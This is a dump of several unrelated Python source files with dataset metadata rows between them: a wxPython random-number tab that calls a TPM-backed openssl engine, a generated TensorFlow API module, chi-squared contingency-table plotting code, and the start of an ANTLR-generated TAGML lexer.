self.rng_type = wx.ComboBox(self, -1, "RN Encoding", choices=rng_type_list, style=wx.CB_READONLY)
clearimage = wx.Image('../images/clear.png', wx.BITMAP_TYPE_PNG).ConvertToBitmap()
clearbutton = wx.BitmapButton(self, -1, clearimage)
# ~clearbutton = wx.BitmapButton(self, -1, img.clear.getBitmap())
backimage = wx.Image('../images/back.png', wx.BITMAP_TYPE_PNG).ConvertToBitmap()
backbutton = wx.BitmapButton(self, -1, backimage)
# ~backbutton = wx.BitmapButton(self, -1, img.back.getBitmap())
# attach the ui elements to the main sizer
mainsizer.Add(button_sizer, 0, wx.EXPAND | wx.LEFT, 5)
mainsizer.Add(self.command_out, 1, wx.EXPAND, 0)
button_sizer.Add(rng_input_blurb, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
button_sizer.Add(self.rng_input, 1, wx.ALIGN_CENTRE | wx.RIGHT, 10)
button_sizer.Add(rng_type_blurb, 0, wx.ALIGN_CENTRE | wx.ALL, 5)
button_sizer.Add(self.rng_type, 1, wx.ALIGN_CENTRE | wx.LEFT, 5)
button_sizer.Add(button_gen_rng, 0, wx.ALIGN_CENTRE | wx.LEFT, 10)
button_sizer.Add(clearbutton, 0, wx.ALIGN_CENTRE | wx.LEFT, 10)
button_sizer.Add(backbutton, 0, wx.ALIGN_CENTRE | wx.ALL, 10)
# Set tooltips
button_gen_rng.SetToolTip(wx.ToolTip("Generate a Random Number, output is based on the dropdown menu."))
clearbutton.SetToolTip(wx.ToolTip("Clear all textboxes."))
# declare and bind events
self.Bind(wx.EVT_BUTTON, self.OnGenRNG, button_gen_rng)
self.Bind(wx.EVT_BUTTON, self.OnClear, clearbutton)
self.Bind(wx.EVT_BUTTON, self.OnBack, backbutton)
self.rng_input.write("32")
self.rng_type.SetSelection(0)
self.SetSizer(mainsizer)
def OnClear(self, evt):
self.command_out.Clear()
# Calling parent of the parent, as direct parent is the notebook,
# then the second parent is the frame, from which we call the destruction
def OnBack(self, evt):
self.Parent.Parent.OnCloseWindow(None)
def OnGenRNG(self, evt):
no_bytes = self.rng_input.GetValue()
try:
no_bytes = abs(int(no_bytes))
except ValueError:
self.command_out.AppendText("Number of bytes is not an integer, try again.\n")
return
rng_output_type = self.rng_type.GetSelection()
if (no_bytes > 128):
no_bytes = 128
self.command_out.AppendText("Number of bytes restricted to 128 for performance purposes.\n")
# if output type is hex
if (rng_output_type == 0):
command_output = exec_cmd.execCLI([
"openssl", "rand",
"-engine", "tpm2tss",
"-hex", str(no_bytes),
])
split_output = command_output.split("\n")
for value in split_output:
if "warning" not in value.lower():
self.command_out.AppendText(value + "\n")
self.command_out.AppendText("'openssl rand -engine tpm2tss -hex " + str(no_bytes) + "' executed \n")
self.command_out.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
# if output type is base64
elif (rng_output_type == 1):
command_output = exec_cmd.execCLI([
"openssl", "rand",
"-engine", "tpm2tss",
"-base64", str(no_bytes),
])
split_output = command_output.split("\n")
for value in split_output:
if "warning" not in value.lower():
self.command_out.AppendText(value + "\n")
self.command_out.AppendText("'openssl rand -engine tpm2tss -base64 " + str(no_bytes) + "' executed \n")
self.command_out.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
else:
self.command_out.AppendText("You need to select the rng output type.\n")
class Tab3Frame(wx.Frame):
def __init__(self, parent, title):
wx.Frame.__init__(self, parent, title="OpenSSL Engine", size=(1280, 720), style=(wx.DEFAULT_FRAME_STYLE & ~(wx.RESIZE_BORDER | wx.MAXIMIZE_BOX)))
self.Centre(wx.BOTH)
main_menu_font = wx.Font(14, wx.FONTFAMILY_ROMAN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
self.SetFont(main_menu_font)
# Instantiate all objects
tab_base = wx.Notebook(self, id=wx.ID_ANY, style=wx.NB_TOP)
self.tab1_rsa_cs = Tab_RSA_CS(tab_base)
self.tab2_ecc_cs = Tab_ECC_CS(tab_base)
tab3_rsa_misc = Tab_RSA_MISC(tab_base)
tab4_rng = Tab_RNG(tab_base)
# Add tabs
tab_base.AddPage(self.tab1_rsa_cs, 'RSA (Client/Server)')
tab_base.AddPage(self.tab2_ecc_cs, 'ECC (Client/Server)')
tab_base.AddPage(tab3_rsa_misc, 'RSA (Enc/Dec/Sign/Verify)')
tab_base.AddPage(tab4_rng, 'RNG')
self.Bind(wx.EVT_CLOSE, self.OnCloseWindow)
self.Show(True)
def OnCloseWindow(self, evt):
#checkProcesses()
self.tab2_ecc_cs.Destroy()
self.tab1_rsa_cs.Destroy()
self.Parent.Show()
self.Destroy()
| 46.481481
| 277
| 0.595331
| 7,692
| 62,750
| 4.653666
| 0.062533
| 0.01989
| 0.029333
| 0.044921
| 0.861186
| 0.835317
| 0.800145
| 0.769751
| 0.743547
| 0.718991
| 0
| 0.015031
| 0.268462
| 62,750
| 1,349
| 278
| 46.515938
| 0.76477
| 0.081976
| 0
| 0.686275
| 0
| 0.029412
| 0.209885
| 0.042467
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065686
| false
| 0
| 0.013725
| 0
| 0.1
| 0.021569
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ae015ede3181ba1897f66d81cf153831718d4d1a
| 785
|
py
|
Python
|
Reinforcement-Learning/Python-Model/venv/lib/python3.8/site-packages/tensorflow/_api/v2/compat/v2/__internal__/test/combinations/__init__.py
|
lawrence910426/ProgrammingII_FinalProject
|
493183dc2a674310e65bffe3a5e00395e8bebb4b
|
[
"MIT"
] | 1
|
2021-05-24T10:08:51.000Z
|
2021-05-24T10:08:51.000Z
|
venv/lib/python3.8/site-packages/tensorflow/_api/v2/compat/v2/__internal__/test/combinations/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | null | null | null |
venv/lib/python3.8/site-packages/tensorflow/_api/v2/compat/v2/__internal__/test/combinations/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | null | null | null |
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Public API for tf.__internal__.test.combinations namespace.
"""
from __future__ import print_function as _print_function
import sys as _sys
from tensorflow.python.framework.combinations import generate
from tensorflow.python.framework.test_combinations import NamedObject
from tensorflow.python.framework.test_combinations import OptionalParameter
from tensorflow.python.framework.test_combinations import ParameterModifier
from tensorflow.python.framework.test_combinations import TestCombination
from tensorflow.python.framework.test_combinations import combine
from tensorflow.python.framework.test_combinations import times
del _print_function
| 41.315789
| 82
| 0.863694
| 98
| 785
| 6.693878
| 0.408163
| 0.195122
| 0.213415
| 0.309451
| 0.466463
| 0.466463
| 0.466463
| 0
| 0
| 0
| 0
| 0
| 0.081529
| 785
| 18
| 83
| 43.611111
| 0.909847
| 0.236943
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.9
| 0
| 0.9
| 0.2
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
bb163c570aa9e000c9a88b82f41d8ff09545b521
| 20
|
py
|
Python
|
telegram_bot/handlers/group/__init__.py
|
Oorzhakau/Iroxin_bot
|
c6608c4248cb5c4ed1b92748d95d5406eec76bb8
|
[
"MIT"
] | null | null | null |
telegram_bot/handlers/group/__init__.py
|
Oorzhakau/Iroxin_bot
|
c6608c4248cb5c4ed1b92748d95d5406eec76bb8
|
[
"MIT"
] | null | null | null |
telegram_bot/handlers/group/__init__.py
|
Oorzhakau/Iroxin_bot
|
c6608c4248cb5c4ed1b92748d95d5406eec76bb8
|
[
"MIT"
] | null | null | null |
from . import group
| 10
| 19
| 0.75
| 3
| 20
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 20
| 1
| 20
| 20
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
bb2b2ef2fdfeca215a78ede3274855a4586c8821
| 7,715
|
py
|
Python
|
NLP/contingency_table.py
|
karandahele/Epilepsy-Repository
|
58f970b25808c0cdcd0dc44ab107cf00d9de74c2
|
[
"MIT"
] | 2
|
2019-11-20T11:12:22.000Z
|
2019-12-23T21:19:34.000Z
|
NLP/contingency_table.py
|
karandahele/Epilepsy-Repository
|
58f970b25808c0cdcd0dc44ab107cf00d9de74c2
|
[
"MIT"
] | 6
|
2020-01-14T17:13:40.000Z
|
2020-04-06T09:19:51.000Z
|
NLP/contingency_table.py
|
karandahele/Epilepsy-Repository
|
58f970b25808c0cdcd0dc44ab107cf00d9de74c2
|
[
"MIT"
] | 3
|
2020-01-14T17:12:02.000Z
|
2020-04-01T13:08:06.000Z
|
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sn
import pandas as pd
import os
from scipy.stats import chi2_contingency
def chi_squared_yates(
no_Gold, no_Resections, no_No_Surgery,
no_Gold_absent_term, no_Resections_absent_term, no_No_Surgery_absent_term,
two_outcomes=True, print_numbers=False):
"""
"Chi-Squared Yates correction: chi2-stat, p-value, DOF, expected ndarray same shape as contingency table"
Returns text to add to contingency table.
"""
if two_outcomes:
obs = np.array([
[no_Gold, no_No_Surgery + no_Resections],
[no_Gold_absent_term, no_No_Surgery_absent_term + no_Resections_absent_term]
])
else:
# three outcomes
obs = np.array([
[no_Gold, no_Resections, no_No_Surgery],
[no_Gold_absent_term, no_Resections_absent_term, no_No_Surgery_absent_term]
])
chi_sq, p_value, dof, exp_arr = chi2_contingency(obs)
# table_chi_sq_text = str("Chi-Sq-stat = ") + str(round(chi_sq,2))
if p_value <0.001:
table_chi_sq_text = "****"
elif p_value <0.01:
table_chi_sq_text = "***"
elif p_value <0.025:
table_chi_sq_text = "**"
elif p_value <0.05:
table_chi_sq_text = "*"
else:
table_chi_sq_text = "-"
if print_numbers:
print("Chi-Squared with Yates correction:")
print("chi2-stat =\t{}".format(chi_sq))
print("p-value =\t{}".format(p_value))
print("DOF =\t{}".format(dof))
print("expected ndarray same shape as contingency table = \n{}".format(exp_arr))
stats_string = "chi2-stat = " + str(round(chi_sq,3)) +\
"\np-value = " + str(round(p_value,9)) +\
"\nDOF = " + str(dof) +\
"\nexpected ndarray = \n" + str(np.around(exp_arr))
return table_chi_sq_text, stats_string
def contingency_table_two_outcomes(term,
no_Gold, no_Resections, no_No_Surgery,
no_Gold_absent_term, no_Resections_absent_term, no_No_Surgery_absent_term,
save_to_folder='L:\\word_docs\\NLP\\contingency_tables\\',
print_numberss=False,
eps=False,
term_regex_str=""):
if not term_regex_str:
term_regex_str = "term"
conf_arr = np.array([
[no_Gold, no_No_Surgery + no_Resections],
[no_Gold_absent_term, no_No_Surgery_absent_term + no_Resections_absent_term]
])
df_cm = pd.DataFrame(conf_arr,
index = ['present', 'absent'],
columns = ['Entirely Seizure-Free', 'Other'])
fig = plt.figure()
plt.clf()
ax = fig.add_subplot(121)
fig.tight_layout()
ax.set_aspect(1)
res = sn.heatmap(df_cm, annot=True, vmin=0.0, vmax=100.0, fmt='.0f')
plt.yticks([0.5,1.5], [term_regex_str + ' present', 'absent'], va='center')
plt.title('''Contingency Table \n Term: {}
'''.format(term))
# add chi-squared test *'s to the top left cell in 2 by 2 table
table_chi_sq_text, stats_string = chi_squared_yates(
no_Gold, no_Resections, no_No_Surgery,
no_Gold_absent_term, no_Resections_absent_term, no_No_Surgery_absent_term,
print_numbers=print_numberss)
left, width = .25, .5
bottom, height = .25, .5
right = left + width
top = bottom + height
ax.text(
0.25*(left+right), 0.65*(bottom+top), table_chi_sq_text,
horizontalalignment='center',
verticalalignment='center',
fontsize=15, color='black',
transform=ax.transAxes)
# add subplot with only text of stats read out
ax2 = fig.add_subplot(122)
plt.title('''Chi-Squared with Yates correction''')
ax2.text(0.4*(left+right), 0.8*(bottom+top), stats_string,
horizontalalignment='center',
verticalalignment='center',
fontsize=9, color='black')
# #remove axes
sn.despine(left=True, top=True, right=True, bottom=True)
#ax.set_frame_on(False)
plt.axis('off')
# save
if eps:
filename = 'confusion_table_2_' + str(term) + '.eps'
filename_and_path = os.path.join(save_to_folder, filename)
plt.savefig(filename_and_path, format='eps', bbox_inches='tight', dpi=1200)
else:
filename = 'confusion_table_2_' + str(term) + '.png'
filename_and_path = os.path.join(save_to_folder, filename)
plt.savefig(filename_and_path, format='png', bbox_inches='tight')
def contingency_table_three_outcomes(term,
no_Gold, no_Resections, no_No_Surgery,
no_Gold_absent_term, no_Resections_absent_term, no_No_Surgery_absent_term,
save_to_folder='L:\\word_docs\\NLP\\contingency_tables\\',
print_numberss=False,
eps=False,
term_regex_str=""):
conf_arr = np.array([
[no_Gold, no_Resections, no_No_Surgery],
[no_Gold_absent_term, no_Resections_absent_term, no_No_Surgery_absent_term]
])
df_cm = pd.DataFrame(conf_arr,
index = ['present', 'absent'],
columns = ['Entirely Seizure-Free', 'Resections', 'No Surgery'])
fig = plt.figure()
plt.clf()
ax = fig.add_subplot(121)
fig.tight_layout()
ax.set_aspect(1)
res = sn.heatmap(df_cm, annot=True, vmin=0.0, vmax=100.0, fmt='.0f')
plt.yticks([0.5,1.5], [term_regex_str + ' present', 'absent'],va='center')
plt.title('''Contingency Table \n Term: {}
'''.format(term))
# add chi-squared *'s to the top left cell in 2 by 2 table
table_chi_sq_text, stats_string = chi_squared_yates(
no_Gold, no_Resections, no_No_Surgery,
no_Gold_absent_term, no_Resections_absent_term, no_No_Surgery_absent_term,
two_outcomes=False, print_numbers=print_numberss)
left, width = .25, .5
bottom, height = .25, .5
right = left + width
top = bottom + height
ax.text(
0.5*0.33*(left+right), 0.65*(bottom+top), table_chi_sq_text,
horizontalalignment='center',
verticalalignment='center',
fontsize=15, color='black',
transform=ax.transAxes)
# add subplot with only text of stats read out
ax2 = fig.add_subplot(122)
plt.title('''Chi-Squared''')
ax2.text(0.4*(left+right), 0.8*(bottom+top), stats_string,
horizontalalignment='center',
verticalalignment='center',
fontsize=9, color='black')
# #remove axes
sn.despine(left=True, top=True, right=True, bottom=True)
#ax.set_frame_on(False)
plt.axis('off')
# save
if eps:
filename = 'confusion_table_3_' + str(term) + '.eps'
filename_and_path = os.path.join(save_to_folder, filename)
plt.savefig(filename_and_path, format='eps', bbox_inches='tight', dpi=1200)
else:
filename = 'confusion_table_3_' + str(term) + '.png'
filename_and_path = os.path.join(save_to_folder, filename)
plt.savefig(filename_and_path, format='png', bbox_inches='tight')
| 36.051402
| 116
| 0.57615
| 964
| 7,715
| 4.31639
| 0.176349
| 0.064888
| 0.047585
| 0.03701
| 0.842826
| 0.823119
| 0.81615
| 0.787311
| 0.769286
| 0.769286
| 0
| 0.022151
| 0.309527
| 7,715
| 214
| 117
| 36.051402
| 0.758964
| 0.066883
| 0
| 0.693333
| 0
| 0
| 0.103111
| 0.011162
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02
| false
| 0
| 0.04
| 0
| 0.066667
| 0.073333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
bb391905eec7a344edde03bf18f2a2bed35f8c55
| 33,929
|
py
|
Python
|
src/TAGMLLexer.py
|
brambg/HyperGraphTools
|
6d661927cca6bcd06e28530b2ea8b6652c9cbe0a
|
[
"Apache-2.0"
] | 1
|
2020-08-28T13:47:37.000Z
|
2020-08-28T13:47:37.000Z
|
src/TAGMLLexer.py
|
rhdekker/HyperGraphTools
|
5c69403ae352e390c2c049b013eefa8977cc796f
|
[
"Apache-2.0"
] | null | null | null |
src/TAGMLLexer.py
|
rhdekker/HyperGraphTools
|
5c69403ae352e390c2c049b013eefa8977cc796f
|
[
"Apache-2.0"
] | 1
|
2019-02-17T15:21:06.000Z
|
2019-02-17T15:21:06.000Z
|
# Generated from tagml/src/main/antlr4/nl/knaw/huc/di/tag/tagml/grammar/TAGMLLexer.g4 by ANTLR 4.7.2
from antlr4 import *
from io import StringIO
from typing.io import TextIO
import sys
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\2[")
buf.write("\u02ea\b\1\b\1\b\1\b\1\b\1\b\1\b\1\b\1\b\1\b\1\b\1\4\2")
buf.write("\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7\t\7\4\b\t\b\4")
buf.write("\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r\4\16\t\16\4\17")
buf.write("\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23\t\23\4\24\t\24")
buf.write("\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30\4\31\t\31\4\32")
buf.write("\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36\t\36\4\37\t\37")
buf.write("\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%\4&\t&\4\'\t\'\4")
buf.write("(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.\t.\4/\t/\4\60\t")
buf.write("\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64\t\64\4\65\t\65")
buf.write("\4\66\t\66\4\67\t\67\48\t8\49\t9\4:\t:\4;\t;\4<\t<\4=")
buf.write("\t=\4>\t>\4?\t?\4@\t@\4A\tA\4B\tB\4C\tC\4D\tD\4E\tE\4")
buf.write("F\tF\4G\tG\4H\tH\4I\tI\4J\tJ\4K\tK\4L\tL\4M\tM\4N\tN\4")
buf.write("O\tO\4P\tP\4Q\tQ\4R\tR\4S\tS\4T\tT\4U\tU\4V\tV\4W\tW\4")
buf.write("X\tX\4Y\tY\4Z\tZ\4[\t[\4\\\t\\\4]\t]\4^\t^\4_\t_\4`\t")
buf.write("`\4a\ta\4b\tb\4c\tc\4d\td\4e\te\4f\tf\4g\tg\4h\th\4i\t")
buf.write("i\4j\tj\4k\tk\4l\tl\4m\tm\4n\tn\4o\to\4p\tp\4q\tq\4r\t")
buf.write("r\4s\ts\4t\tt\4u\tu\4v\tv\4w\tw\3\2\3\2\3\2\3\2\3\2\3")
buf.write("\2\3\2\3\2\3\3\3\3\3\3\3\3\3\4\3\4\3\4\3\4\3\5\3\5\3\5")
buf.write("\3\5\3\6\3\6\3\6\3\6\3\7\3\7\6\7\u0114\n\7\r\7\16\7\u0115")
buf.write("\3\b\3\b\3\b\7\b\u011b\n\b\f\b\16\b\u011e\13\b\3\b\3\b")
buf.write("\5\b\u0122\n\b\3\t\6\t\u0125\n\t\r\t\16\t\u0126\3\n\3")
buf.write("\n\3\n\3\n\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13")
buf.write("\3\13\3\13\3\13\3\13\3\13\3\13\5\13\u013c\n\13\3\13\3")
buf.write("\13\6\13\u0140\n\13\r\13\16\13\u0141\3\f\3\f\3\f\3\f\3")
buf.write("\r\3\r\3\r\3\r\3\16\3\16\5\16\u014e\n\16\3\17\3\17\3\20")
buf.write("\3\20\3\21\3\21\3\22\3\22\3\22\6\22\u0159\n\22\r\22\16")
buf.write("\22\u015a\5\22\u015d\n\22\3\23\3\23\3\23\3\23\3\23\3\24")
buf.write("\3\24\3\24\3\24\3\25\3\25\3\25\3\25\3\26\3\26\3\26\3\26")
buf.write("\3\27\3\27\3\30\3\30\3\30\3\30\3\31\3\31\3\31\3\31\3\32")
buf.write("\3\32\3\32\3\32\3\32\3\33\3\33\3\33\3\33\3\33\3\34\3\34")
buf.write("\3\34\3\34\3\34\3\35\3\35\3\35\3\35\3\36\3\36\3\36\6\36")
buf.write("\u0190\n\36\r\36\16\36\u0191\3\36\3\36\3\36\3\36\6\36")
buf.write("\u0198\n\36\r\36\16\36\u0199\3\36\5\36\u019d\n\36\3\36")
buf.write("\3\36\3\37\6\37\u01a2\n\37\r\37\16\37\u01a3\3\37\3\37")
buf.write("\6\37\u01a8\n\37\r\37\16\37\u01a9\5\37\u01ac\n\37\3\37")
buf.write("\3\37\3 \3 \3 \3 \3 \3 \3 \3!\3!\3!\3!\3!\3!\3!\3!\3\"")
buf.write("\3\"\3\"\3\"\3#\3#\3#\3#\3#\3$\3$\3$\3$\3%\3%\3%\3%\3")
buf.write("%\3&\3&\3&\3&\3\'\3\'\3\'\3\'\3(\3(\3(\3(\3)\3)\3)\3)")
buf.write("\3*\3*\3*\3*\3+\3+\6+\u01e7\n+\r+\16+\u01e8\3,\3,\3,\3")
buf.write(",\3,\3,\3-\3-\3-\3-\3.\3.\3.\3.\3/\3/\3\60\3\60\3\60\3")
buf.write("\60\3\60\3\61\3\61\3\61\3\61\3\62\7\62\u0205\n\62\f\62")
buf.write("\16\62\u0208\13\62\3\62\3\62\3\62\3\62\3\62\3\63\3\63")
buf.write("\5\63\u0211\n\63\3\63\3\63\3\64\7\64\u0216\n\64\f\64\16")
buf.write("\64\u0219\13\64\3\64\3\64\3\64\3\64\3\64\3\65\3\65\5\65")
buf.write("\u0222\n\65\3\66\3\66\3\67\3\67\38\38\39\39\39\69\u022d")
buf.write("\n9\r9\169\u022e\59\u0231\n9\3:\3:\3:\3:\3;\3;\3;\3;\3")
buf.write("<\3<\3<\3<\3=\3=\6=\u0241\n=\r=\16=\u0242\3>\3>\3>\3>")
buf.write("\3?\3?\3?\3?\3@\3@\3@\3@\3A\3A\3A\3A\3B\3B\3B\3B\3B\7")
buf.write("B\u025a\nB\fB\16B\u025d\13B\3B\3B\3B\3B\3C\3C\3D\3D\3")
buf.write("E\3E\3E\3F\3F\3F\3G\3G\3H\3H\3I\3I\3J\3J\3K\3K\3L\3L\3")
buf.write("M\3M\3N\3N\3O\3O\3P\3P\3Q\3Q\3R\3R\3S\3S\3T\3T\3T\3T\3")
buf.write("T\5T\u028c\nT\3U\3U\3U\5U\u0291\nU\3V\3V\3V\5V\u0296\n")
buf.write("V\3W\3W\3W\5W\u029b\nW\3X\3X\3X\5X\u02a0\nX\3Y\3Y\3Y\3")
buf.write("Z\3Z\3[\3[\3\\\3\\\3]\3]\3^\3^\3_\3_\3`\3`\3a\3a\3b\3")
buf.write("b\3c\3c\3d\3d\3e\3e\3f\3f\3g\3g\3h\3h\3i\3i\3j\3j\3k\3")
buf.write("k\3l\3l\3m\3m\3n\3n\3o\3o\3p\3p\3q\3q\3r\3r\3s\3s\3t\3")
buf.write("t\3t\3t\5t\u02dd\nt\3u\5u\u02e0\nu\3v\3v\5v\u02e4\nv\3")
buf.write("w\6w\u02e7\nw\rw\16w\u02e8\3\u025b\2x\r\3\17\4\21\5\23")
buf.write("\6\25\7\27\b\31\t\33\n\35\13\37\f!\r#\16%\17\'\20)\21")
buf.write("+\22-\23/\24\61\25\63\26\65\27\67\309\31;\32=\33?\34A")
buf.write("\35C\36E\37G I!K\"M#O$Q%S&U\'W(Y)[*]+_,a-c.e/g\60i\61")
buf.write("k\62m\63o\64q\65s\66u\67w8y9{:};\177<\u0081=\u0083>\u0085")
buf.write("?\u0087@\u0089A\u008bB\u008dC\u008fD\u0091E\u0093F\u0095")
buf.write("G\u0097H\u0099I\u009bJ\u009dK\u009fL\u00a1M\u00a3N\u00a5")
buf.write("O\u00a7P\u00a9Q\u00abR\u00adS\u00afT\u00b1U\u00b3V\u00b5")
buf.write("W\u00b7X\u00b9Y\u00bb\2\u00bd\2\u00bf\2\u00c1\2\u00c3")
buf.write("\2\u00c5\2\u00c7\2\u00c9\2\u00cb\2\u00cd\2\u00cf\2\u00d1")
buf.write("\2\u00d3\2\u00d5\2\u00d7\2\u00d9\2\u00db\2\u00dd\2\u00df")
buf.write("\2\u00e1\2\u00e3\2\u00e5\2\u00e7\2\u00e9\2\u00eb\2\u00ed")
buf.write("\2\u00ef\2\u00f1\2\u00f3\2\u00f5Z\u00f7[\r\2\3\4\5\6\7")
buf.write("\b\t\n\13\f%\4\2>>]^\3\2$$\3\2))\5\2>>]]~~\3\2\62;\4\2")
buf.write("CCcc\4\2DDdd\4\2EEee\4\2FFff\4\2GGgg\4\2HHhh\4\2IIii\4")
buf.write("\2JJjj\4\2KKkk\4\2LLll\4\2MMmm\4\2NNnn\4\2OOoo\4\2PPp")
buf.write("p\4\2QQqq\4\2RRrr\4\2SSss\4\2TTtt\4\2UUuu\4\2VVvv\4\2")
buf.write("WWww\4\2XXxx\4\2YYyy\4\2ZZzz\4\2[[{{\4\2\\\\||\4\2//a")
buf.write("a\5\2\u00b9\u00b9\u0302\u0371\u2041\u2042\n\2<<C\\c|\u2072")
buf.write("\u2191\u2c02\u2ff1\u3003\ud801\uf902\ufdd1\ufdf2\uffff")
buf.write("\5\2\13\f\17\17\"\"\2\u02eb\2\r\3\2\2\2\2\17\3\2\2\2\2")
buf.write("\21\3\2\2\2\2\23\3\2\2\2\2\25\3\2\2\2\2\27\3\2\2\2\2\31")
buf.write("\3\2\2\2\3\33\3\2\2\2\3\35\3\2\2\2\3\37\3\2\2\2\3!\3\2")
buf.write("\2\2\4#\3\2\2\2\4%\3\2\2\2\4\'\3\2\2\2\4)\3\2\2\2\4+\3")
buf.write("\2\2\2\4-\3\2\2\2\4/\3\2\2\2\4\61\3\2\2\2\4\63\3\2\2\2")
buf.write("\5\65\3\2\2\2\5\67\3\2\2\2\59\3\2\2\2\5;\3\2\2\2\5=\3")
buf.write("\2\2\2\5?\3\2\2\2\5A\3\2\2\2\6C\3\2\2\2\6E\3\2\2\2\6G")
buf.write("\3\2\2\2\6I\3\2\2\2\6K\3\2\2\2\6M\3\2\2\2\6O\3\2\2\2\6")
buf.write("Q\3\2\2\2\6S\3\2\2\2\7U\3\2\2\2\bW\3\2\2\2\bY\3\2\2\2")
buf.write("\b[\3\2\2\2\b]\3\2\2\2\b_\3\2\2\2\ba\3\2\2\2\tc\3\2\2")
buf.write("\2\te\3\2\2\2\tg\3\2\2\2\ti\3\2\2\2\tk\3\2\2\2\tm\3\2")
buf.write("\2\2\no\3\2\2\2\nq\3\2\2\2\13s\3\2\2\2\13u\3\2\2\2\13")
buf.write("w\3\2\2\2\13y\3\2\2\2\13{\3\2\2\2\13}\3\2\2\2\13\177\3")
buf.write("\2\2\2\f\u0081\3\2\2\2\f\u0083\3\2\2\2\f\u0085\3\2\2\2")
buf.write("\f\u0087\3\2\2\2\f\u0089\3\2\2\2\f\u008b\3\2\2\2\f\u008d")
buf.write("\3\2\2\2\f\u008f\3\2\2\2\f\u0091\3\2\2\2\f\u0093\3\2\2")
buf.write("\2\f\u0095\3\2\2\2\f\u0097\3\2\2\2\f\u0099\3\2\2\2\f\u009b")
buf.write("\3\2\2\2\f\u009d\3\2\2\2\f\u009f\3\2\2\2\f\u00a1\3\2\2")
buf.write("\2\f\u00a3\3\2\2\2\f\u00a5\3\2\2\2\f\u00a7\3\2\2\2\f\u00a9")
buf.write("\3\2\2\2\f\u00ab\3\2\2\2\f\u00ad\3\2\2\2\f\u00af\3\2\2")
buf.write("\2\f\u00b1\3\2\2\2\f\u00b3\3\2\2\2\f\u00b5\3\2\2\2\f\u00b7")
buf.write("\3\2\2\2\f\u00b9\3\2\2\2\f\u00f5\3\2\2\2\f\u00f7\3\2\2")
buf.write("\2\r\u00f9\3\2\2\2\17\u0101\3\2\2\2\21\u0105\3\2\2\2\23")
buf.write("\u0109\3\2\2\2\25\u010d\3\2\2\2\27\u0113\3\2\2\2\31\u0121")
buf.write("\3\2\2\2\33\u0124\3\2\2\2\35\u0128\3\2\2\2\37\u013b\3")
buf.write("\2\2\2!\u0143\3\2\2\2#\u0147\3\2\2\2%\u014d\3\2\2\2\'")
buf.write("\u014f\3\2\2\2)\u0151\3\2\2\2+\u0153\3\2\2\2-\u0155\3")
buf.write("\2\2\2/\u015e\3\2\2\2\61\u0163\3\2\2\2\63\u0167\3\2\2")
buf.write("\2\65\u016b\3\2\2\2\67\u016f\3\2\2\29\u0171\3\2\2\2;\u0175")
buf.write("\3\2\2\2=\u0179\3\2\2\2?\u017e\3\2\2\2A\u0183\3\2\2\2")
buf.write("C\u0188\3\2\2\2E\u019c\3\2\2\2G\u01a1\3\2\2\2I\u01af\3")
buf.write("\2\2\2K\u01b6\3\2\2\2M\u01be\3\2\2\2O\u01c2\3\2\2\2Q\u01c7")
buf.write("\3\2\2\2S\u01cb\3\2\2\2U\u01d0\3\2\2\2W\u01d4\3\2\2\2")
buf.write("Y\u01d8\3\2\2\2[\u01dc\3\2\2\2]\u01e0\3\2\2\2_\u01e6\3")
buf.write("\2\2\2a\u01ea\3\2\2\2c\u01f0\3\2\2\2e\u01f4\3\2\2\2g\u01f8")
buf.write("\3\2\2\2i\u01fa\3\2\2\2k\u01ff\3\2\2\2m\u0206\3\2\2\2")
